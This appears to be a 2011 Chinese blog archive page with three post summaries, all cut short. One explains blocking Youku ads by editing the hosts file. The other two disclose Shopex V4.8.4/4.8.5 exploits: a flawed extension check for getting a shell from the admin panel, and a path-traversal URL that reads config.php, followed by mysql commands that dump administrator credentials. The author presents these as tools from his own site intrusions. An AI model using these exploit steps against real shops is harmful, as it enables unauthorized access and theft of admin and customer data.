摘要:
屏蔽优酷、土豆等所有视频网站的15秒广告很简单的哦。就是改hosts的!在改之前最好先备份一下hosts。修改方法如下第一步:找到C:\WINDOWS\system32\drivers\etc里面的hosts文件,双击打开,选用记事本打开。添加如下代码:优酷:127.0.0.1 atm.youku.com127.0.0.1 Fvid.atm.youku.com127.0.0.1 html.atm.youku.com127.0.0.1 valb.atm.youku.com127.0.0.1 valf.atm.youku.com127.0.0.1 valo.atm.youku.com127.0.0 阅读全文
随笔档案-2011年03月
Shopex V4.8.4 V4.8.5 后台拿Shell 0Days
2011-03-28 08:44 by 狼人:-), 964 阅读, 收藏, 编辑
摘要:
ctl.template.php :function saveContent(){ if(strtolower(substr($_POST['file'],-4,4))=='.php') $_POST['file']='index.html';//只验证最后4位数 $this->begin('index.php?ctl=system/template&act=edit&p[0]='.$_POST['theme']); $o = $this->system->load 阅读全文
Shopex V4.8.4|V4.8.5下载任意文件漏洞
2011-03-28 08:25 by 狼人:-), 1312 阅读, 收藏, 编辑
摘要:
利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。找到一个漏洞,还是发出来吧。读取任意文件漏洞:http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php复制代码可以连上数据库。mysql -h1.1..1.1 -uuser -ppassuse yourbasename;select * from sdb_operators;得到管理员用户密码./shopadmin/ 登陆后 阅读全文